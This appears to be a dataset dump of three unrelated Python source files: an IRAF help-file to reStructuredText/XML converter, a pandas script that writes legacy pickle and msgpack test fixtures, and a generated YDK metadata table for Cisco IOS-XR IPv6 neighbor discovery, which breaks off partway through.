gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
################################# LICENSE ##################################
# Copyright (c) 2009, South African Astronomical Observatory (SAAO) #
# All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions #
# are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# * Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer #
# in the documentation and/or other materials provided with the #
# distribution. #
# * Neither the name of the South African Astronomical Observatory #
# (SAAO) nor the names of its contributors may be used to endorse #
# or promote products derived from this software without specific #
# prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE SAAO ''AS IS'' AND ANY EXPRESS OR #
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED #
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE #
# DISCLAIMED. IN NO EVENT SHALL THE SAAO BE LIABLE FOR ANY #
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS #
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) #
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, #
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN #
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
############################################################################
#! /usr/bin/env python
"""Tool to convert IRAF style help files to ReStructuredText or XML format."""
from __future__ import with_statement
import re
import xml.dom.minidom
class IrafHelpParser:
"""Parser used to convert IRAF style help files to ReStructuredText or XML format."""
def add_element(self,name,attribute=None):
"""Add element to DOM tree."""
element=self.dom.createElement(name)
if attribute is not None:
element.setAttribute('name',str(attribute))
self.current_node=self.current_node.appendChild(element)
def add_reference(self,key=None):
self.add_element('reference',key)
def add_section(self,name=None):
"""Add section to DOM tree."""
if self.in_section:
self.move_up()
self.add_element('section',name)
self.in_section=True
def move_up(self):
"""Move up one level in the DOM tree."""
p=self.current_node.tagName
self.current_node=self.current_node.parentNode
def add_text(self,s):
"""Add a text node to the DOM tree."""
self.current_node.appendChild(self.dom.createTextNode(s))
def __init__(self,file):
"""Read file and parse markup into DOM."""
# Read file into list and strip whitespace
with open(file) as f:
lines=[l.strip() for l in f.readlines()]
# Generate a empty DOM and set node to root element
implement=xml.dom.minidom.getDOMImplementation()
self.dom=implement.createDocument(None, "document", None)
self.current_node=self.dom.documentElement
# Helper variables
self.in_document=False
self.in_section=False
while True:
try:
l=lines.pop(0)
if re.match('\.help',l):
self.in_document=True
name=re.split('\.help',l)[1].split()[0]
self.add_element('help',name)
elif re.match('\.ih',l):
name=lines.pop(0)
self.add_section(name.capitalize())
# Check for references
if re.match('SEE ALSO',name.strip()):
references=lines.pop(0)
for r in references.split():
self.add_reference(r.strip(',').strip())
elif re.match('\.nf',l):
self.add_element('source')
elif re.match('\.fi',l):
self.move_up()
elif re.match('\.ls',l):
name=re.split('\.ls',l)[1]
self.add_element('parameter',name)
elif re.match('\.le',l):
self.move_up()
elif re.match('\.ju',l):
pass
elif re.match('\.re',l):
pass
elif re.match('\.sh',l):
pass
elif re.match('\.br',l):
pass
elif re.match('\.ce',l):
pass
elif re.match('\.sp',l):
pass
elif re.match('\.in',l):
pass
elif re.match('\.endhelp',l):
break
elif self.in_document:
self.add_text(l)
except IndexError:
break
# Clean some redundant whitespace nodes
self.clean_tree()
def clean_tree(self):
"""Removes redundant blank lines."""
source_list=self.dom.getElementsByTagName('source')
# List of nodes to be deleted
delete=[]
def isempty(node):
if node is None:
return False
elif node.nodeType==node.TEXT_NODE and node.data.strip()=='':
return True
else:
return False
for node in source_list:
# Travel up the tree
sibling=node.previousSibling
while isempty(sibling):
delete.append(sibling)
sibling=sibling.previousSibling
# Travel down the tree
sibling=node.nextSibling
while isempty(sibling):
delete.append(sibling)
sibling=sibling.nextSibling
# Delete all marked nodes
for node in delete:
node.parentNode.removeChild(node)
def element_to_rst(self,node,indent=0):
"""Recursively move trough all child nodes of *node* and output ReStructuredText."""
rst=""
# Check if we should append a newline becouse previous block was a
# source example
if node.previousSibling is not None and node.previousSibling.nodeName=='source':
rst+='\n'
if node.nodeType == node.TEXT_NODE:
if node.parentNode.nodeName=='source':
rst+=' '*indent+node.data+'\n'
else:
rst+=' '*indent+node.data.replace('"','``')+'\n'
elif node.nodeName == 'help':
name=node.getAttribute('name')
rst+='.. _'+name.strip()+':'+'\n\n'
rst+='*'*len(name)+'\n'
rst+=name+'\n'
rst+='*'*len(name)+'\n\n'
elif node.nodeName == 'section':
name=node.getAttribute('name')
rst+='\n'
rst+=name+'\n'
rst+='='*len(name)+'\n\n'
elif node.nodeName == 'parameter':
name=node.getAttribute('name')
rst+='\n'+'*'+name.strip()+'*'+'\n'
indent+=4
elif node.nodeName == 'source':
indent+=4
elif node.nodeName == 'reference':
name=node.getAttribute('name')
rst+=' :ref:`'+name.strip()+'`'
# Check if we should append :: because next non empty block is
# a source code example.
if node.nextSibling is not None and node.nextSibling.nodeName=='source':
rst=rst.rstrip().rstrip('.').rstrip(':')+'::'+'\n\n'
# Recurse through child nodes if any
if node.hasChildNodes():
for e in node.childNodes:
rst+=self.element_to_rst(e,indent)
return rst
def get_xml(self):
"""Return DOM tree as well formed XML."""
return self.dom.toprettyxml(indent=' ', newl='\n')
def get_rst(self):
"""Return ReStructuredText for entire DOM tree."""
rst=""
# Get root element
rst+=self.element_to_rst(self.dom)
return rst
def help2ReStructuredText(file):
"""Converts IRAF help file to ReStructuredText format."""
parser=IrafHelpParser(file)
return parser.get_rst()
def help2Xml(file):
"""Converts IRAF help file to XML format."""
parser=IrafHelpParser(file)
return parser.get_xml()
if __name__ == "__main__":
import sys
print help2ReStructuredText(str(sys.argv[1]))
|
|
""" self-contained to write legacy storage (pickle/msgpack) files """
from __future__ import print_function
from distutils.version import LooseVersion
from pandas import (Series, DataFrame, Panel,
SparseSeries, SparseDataFrame,
Index, MultiIndex, bdate_range, to_msgpack,
date_range, period_range,
Timestamp, NaT, Categorical, Period)
from pandas.compat import u
import os
import sys
import numpy as np
import pandas
import platform as pl
_loose_version = LooseVersion(pandas.__version__)
def _create_sp_series():
nan = np.nan
# nan-based
arr = np.arange(15, dtype=np.float64)
arr[7:12] = nan
arr[-1:] = nan
bseries = SparseSeries(arr, kind='block')
bseries.name = u'bseries'
return bseries
def _create_sp_tsseries():
nan = np.nan
# nan-based
arr = np.arange(15, dtype=np.float64)
arr[7:12] = nan
arr[-1:] = nan
date_index = bdate_range('1/1/2011', periods=len(arr))
bseries = SparseSeries(arr, index=date_index, kind='block')
bseries.name = u'btsseries'
return bseries
def _create_sp_frame():
nan = np.nan
data = {u'A': [nan, nan, nan, 0, 1, 2, 3, 4, 5, 6],
u'B': [0, 1, 2, nan, nan, nan, 3, 4, 5, 6],
u'C': np.arange(10).astype(np.int64),
u'D': [0, 1, 2, 3, 4, 5, nan, nan, nan, nan]}
dates = bdate_range('1/1/2011', periods=10)
return SparseDataFrame(data, index=dates)
def create_data():
""" create the pickle/msgpack data """
data = {
u'A': [0., 1., 2., 3., np.nan],
u'B': [0, 1, 0, 1, 0],
u'C': [u'foo1', u'foo2', u'foo3', u'foo4', u'foo5'],
u'D': date_range('1/1/2009', periods=5),
u'E': [0., 1, Timestamp('20100101'), u'foo', 2.]
}
scalars = dict(timestamp=Timestamp('20130101'),
period=Period('2012', 'M'))
index = dict(int=Index(np.arange(10)),
date=date_range('20130101', periods=10),
period=period_range('2013-01-01', freq='M', periods=10))
mi = dict(reg2=MultiIndex.from_tuples(
tuple(zip(*[[u'bar', u'bar', u'baz', u'baz', u'foo',
u'foo', u'qux', u'qux'],
[u'one', u'two', u'one', u'two', u'one',
u'two', u'one', u'two']])),
names=[u'first', u'second']))
series = dict(float=Series(data[u'A']),
int=Series(data[u'B']),
mixed=Series(data[u'E']),
ts=Series(np.arange(10).astype(np.int64),
index=date_range('20130101', periods=10)),
mi=Series(np.arange(5).astype(np.float64),
index=MultiIndex.from_tuples(
tuple(zip(*[[1, 1, 2, 2, 2],
[3, 4, 3, 4, 5]])),
names=[u'one', u'two'])),
dup=Series(np.arange(5).astype(np.float64),
index=[u'A', u'B', u'C', u'D', u'A']),
cat=Series(Categorical([u'foo', u'bar', u'baz'])),
dt=Series(date_range('20130101', periods=5)),
dt_tz=Series(date_range('20130101', periods=5,
tz='US/Eastern')),
period=Series([Period('2000Q1')] * 5))
mixed_dup_df = DataFrame(data)
mixed_dup_df.columns = list(u"ABCDA")
frame = dict(float=DataFrame({u'A': series[u'float'],
u'B': series[u'float'] + 1}),
int=DataFrame({u'A': series[u'int'],
u'B': series[u'int'] + 1}),
mixed=DataFrame({k: data[k]
for k in [u'A', u'B', u'C', u'D']}),
mi=DataFrame({u'A': np.arange(5).astype(np.float64),
u'B': np.arange(5).astype(np.int64)},
index=MultiIndex.from_tuples(
tuple(zip(*[[u'bar', u'bar', u'baz',
u'baz', u'baz'],
[u'one', u'two', u'one',
u'two', u'three']])),
names=[u'first', u'second'])),
dup=DataFrame(np.arange(15).reshape(5, 3).astype(np.float64),
columns=[u'A', u'B', u'A']),
cat_onecol=DataFrame({u'A': Categorical([u'foo', u'bar'])}),
cat_and_float=DataFrame({
u'A': Categorical([u'foo', u'bar', u'baz']),
u'B': np.arange(3).astype(np.int64)}),
mixed_dup=mixed_dup_df,
dt_mixed_tzs=DataFrame({
u'A': Timestamp('20130102', tz='US/Eastern'),
u'B': Timestamp('20130603', tz='CET')}, index=range(5))
)
mixed_dup_panel = Panel({u'ItemA': frame[u'float'],
u'ItemB': frame[u'int']})
mixed_dup_panel.items = [u'ItemA', u'ItemA']
panel = dict(float=Panel({u'ItemA': frame[u'float'],
u'ItemB': frame[u'float'] + 1}),
dup=Panel(np.arange(30).reshape(3, 5, 2).astype(np.float64),
items=[u'A', u'B', u'A']),
mixed_dup=mixed_dup_panel)
cat = dict(int8=Categorical(list('abcdefg')),
int16=Categorical(np.arange(1000)),
int32=Categorical(np.arange(10000)))
timestamp = dict(normal=Timestamp('2011-01-01'),
nat=NaT,
tz=Timestamp('2011-01-01', tz='US/Eastern'),
freq=Timestamp('2011-01-01', freq='D'),
both=Timestamp('2011-01-01', tz='Asia/Tokyo',
freq='M'))
return dict(series=series,
frame=frame,
panel=panel,
index=index,
scalars=scalars,
mi=mi,
sp_series=dict(float=_create_sp_series(),
ts=_create_sp_tsseries()),
sp_frame=dict(float=_create_sp_frame()),
cat=cat,
timestamp=timestamp)
def create_pickle_data():
data = create_data()
# Pre-0.14.1 versions generated non-unpicklable mixed-type frames and
# panels if their columns/items were non-unique.
if _loose_version < '0.14.1':
del data['frame']['mixed_dup']
del data['panel']['mixed_dup']
if _loose_version < '0.17.0':
del data['series']['period']
del data['scalars']['period']
return data
def _u(x):
return {u(k): _u(x[k]) for k in x} if isinstance(x, dict) else x
def create_msgpack_data():
data = create_data()
if _loose_version < '0.17.0':
del data['frame']['mixed_dup']
del data['panel']['mixed_dup']
del data['frame']['dup']
del data['panel']['dup']
if _loose_version < '0.18.0':
del data['series']['dt_tz']
del data['frame']['dt_mixed_tzs']
# Not supported
del data['sp_series']
del data['sp_frame']
del data['series']['cat']
del data['series']['period']
del data['frame']['cat_onecol']
del data['frame']['cat_and_float']
del data['scalars']['period']
return _u(data)
def platform_name():
return '_'.join([str(pandas.__version__), str(pl.machine()),
str(pl.system().lower()), str(pl.python_version())])
def write_legacy_pickles(output_dir):
# make sure we are < 0.13 compat (in py3)
try:
from pandas.compat import zip, cPickle as pickle # noqa
except:
import pickle
version = pandas.__version__
print("This script generates a storage file for the current arch, system, "
"and python version")
print(" pandas version: {0}".format(version))
print(" output dir : {0}".format(output_dir))
print(" storage format: pickle")
pth = '{0}.pickle'.format(platform_name())
fh = open(os.path.join(output_dir, pth), 'wb')
pickle.dump(create_pickle_data(), fh, pickle.HIGHEST_PROTOCOL)
fh.close()
print("created pickle file: %s" % pth)
def write_legacy_msgpack(output_dir, compress):
version = pandas.__version__
print("This script generates a storage file for the current arch, "
"system, and python version")
print(" pandas version: {0}".format(version))
print(" output dir : {0}".format(output_dir))
print(" storage format: msgpack")
pth = '{0}.msgpack'.format(platform_name())
to_msgpack(os.path.join(output_dir, pth), create_msgpack_data(),
compress=compress)
print("created msgpack file: %s" % pth)
def write_legacy_file():
# force our cwd to be the first searched
sys.path.insert(0, '.')
if not (3 <= len(sys.argv) <= 4):
exit("Specify output directory and storage type: generate_legacy_"
"storage_files.py <output_dir> <storage_type> "
"<msgpack_compress_type>")
output_dir = str(sys.argv[1])
storage_type = str(sys.argv[2])
try:
compress_type = str(sys.argv[3])
except IndexError:
compress_type = None
if storage_type == 'pickle':
write_legacy_pickles(output_dir=output_dir)
elif storage_type == 'msgpack':
write_legacy_msgpack(output_dir=output_dir, compress=compress_type)
else:
exit("storage_type must be one of {'pickle', 'msgpack'}")
if __name__ == '__main__':
write_legacy_file()
|
|
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'Ipv6NdShVrStateEnum' : _MetaInfoEnum('Ipv6NdShVrStateEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper',
{
'deleted':'DELETED',
'standby':'STANDBY',
'active':'ACTIVE',
}, 'Cisco-IOS-XR-ipv6-nd-oper', _yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper']),
'Ipv6NdShStateEnum' : _MetaInfoEnum('Ipv6NdShStateEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper',
{
'incomplete':'INCOMPLETE',
'reachable':'REACHABLE',
'stale':'STALE',
'glean':'GLEAN',
'delay':'DELAY',
'probe':'PROBE',
'delete':'DELETE',
}, 'Cisco-IOS-XR-ipv6-nd-oper', _yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper']),
'Ipv6NdMediaEncapEnum' : _MetaInfoEnum('Ipv6NdMediaEncapEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper',
{
'none':'NONE',
'arpa':'ARPA',
'snap':'SNAP',
'ieee802-1q':'IEEE802_1Q',
'srp':'SRP',
'srpa':'SRPA',
'srpb':'SRPB',
'ppp':'PPP',
'hdlc':'HDLC',
'chdlc':'CHDLC',
'dot1q':'DOT1Q',
'fr':'FR',
'gre':'GRE',
}, 'Cisco-IOS-XR-ipv6-nd-oper', _yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper']),
'Ipv6NdShVrFlagsEnum' : _MetaInfoEnum('Ipv6NdShVrFlagsEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper',
{
'no-flags':'NO_FLAGS',
'final-ra':'FINAL_RA',
}, 'Cisco-IOS-XR-ipv6-nd-oper', _yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper']),
'Ipv6NdBndlStateEnum' : _MetaInfoEnum('Ipv6NdBndlStateEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper',
{
'run':'RUN',
'error':'ERROR',
'wait':'WAIT',
}, 'Cisco-IOS-XR-ipv6-nd-oper', _yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper']),
'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress.LastReachedTime' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress.LastReachedTime',
False,
[
_MetaInfoClassMember('seconds', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Number of seconds
''',
'seconds',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'last-reached-time',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress',
False,
[
_MetaInfoClassMember('host-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Host Address
''',
'host_address',
'Cisco-IOS-XR-ipv6-nd-oper', True),
_MetaInfoClassMember('encapsulation', REFERENCE_ENUM_CLASS, 'Ipv6NdMediaEncapEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NdMediaEncapEnum',
[], [],
''' Preferred media encap type
''',
'encapsulation',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], [],
''' Interface name
''',
'interface_name',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('last-reached-time', REFERENCE_CLASS, 'LastReachedTime' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress.LastReachedTime',
[], [],
''' Last time of reachability
''',
'last_reached_time',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('link-layer-address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Link-Layer Address
''',
'link_layer_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('location', ATTRIBUTE, 'str' , None, None,
[], ['([a-zA-Z0-9_]*\\d+/){1,2}([a-zA-Z0-9_]*\\d+)'],
''' Location where the neighbor entry exists
''',
'location',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('reachability-state', REFERENCE_ENUM_CLASS, 'Ipv6NdShStateEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NdShStateEnum',
[], [],
''' Current state
''',
'reachability_state',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('selected-encapsulation', REFERENCE_ENUM_CLASS, 'Ipv6NdMediaEncapEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NdMediaEncapEnum',
[], [],
''' Selected media encap
''',
'selected_encapsulation',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'host-address',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses',
False,
[
_MetaInfoClassMember('host-address', REFERENCE_LIST, 'HostAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress',
[], [],
''' IPv6 Neighbor detailed information
''',
'host_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'host-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3}\\d+)|(([a-zA-Z0-9_]*\\d+/){4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Interface Name
''',
'interface_name',
'Cisco-IOS-XR-ipv6-nd-oper', True),
_MetaInfoClassMember('host-addresses', REFERENCE_CLASS, 'HostAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses',
[], [],
''' IPv6 node discovery list of neighbor host
addresses
''',
'host_addresses',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'neighbor-interface',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces',
False,
[
_MetaInfoClassMember('neighbor-interface', REFERENCE_LIST, 'NeighborInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface',
[], [],
''' IPv6 node discovery neighbor interface
''',
'neighbor_interface',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'neighbor-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Multicast' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Multicast',
False,
[
_MetaInfoClassMember('delayed-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total delayed entries
''',
'delayed_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('deleted-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total deleted entries
''',
'deleted_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('incomplete-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total incomplete entries
''',
'incomplete_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('probe-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total probe entries
''',
'probe_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('reachable-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total reachable entries
''',
'reachable_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('stale-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total stale entries
''',
'stale_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('subtotal-neighbor-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total number of entries
''',
'subtotal_neighbor_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'multicast',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Static' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Static',
False,
[
_MetaInfoClassMember('delayed-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total delayed entries
''',
'delayed_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('deleted-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total deleted entries
''',
'deleted_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('incomplete-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total incomplete entries
''',
'incomplete_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('probe-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total probe entries
''',
'probe_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('reachable-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total reachable entries
''',
'reachable_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('stale-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total stale entries
''',
'stale_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('subtotal-neighbor-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total number of entries
''',
'subtotal_neighbor_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'static',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Dynamic' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Dynamic',
False,
[
_MetaInfoClassMember('delayed-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total delayed entries
''',
'delayed_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('deleted-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total deleted entries
''',
'deleted_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('incomplete-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total incomplete entries
''',
'incomplete_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('probe-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total probe entries
''',
'probe_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('reachable-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total reachable entries
''',
'reachable_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('stale-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total stale entries
''',
'stale_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('subtotal-neighbor-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total number of entries
''',
'subtotal_neighbor_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'dynamic',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NeighborSummary' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborSummary',
False,
[
_MetaInfoClassMember('dynamic', REFERENCE_CLASS, 'Dynamic' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Dynamic',
[], [],
''' Dynamic neighbor summary
''',
'dynamic',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('multicast', REFERENCE_CLASS, 'Multicast' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Multicast',
[], [],
''' Multicast neighbor summary
''',
'multicast',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('static', REFERENCE_CLASS, 'Static' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Static',
[], [],
''' Static neighbor summary
''',
'static',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('total-neighbor-entries', ATTRIBUTE, 'int' , None, None,
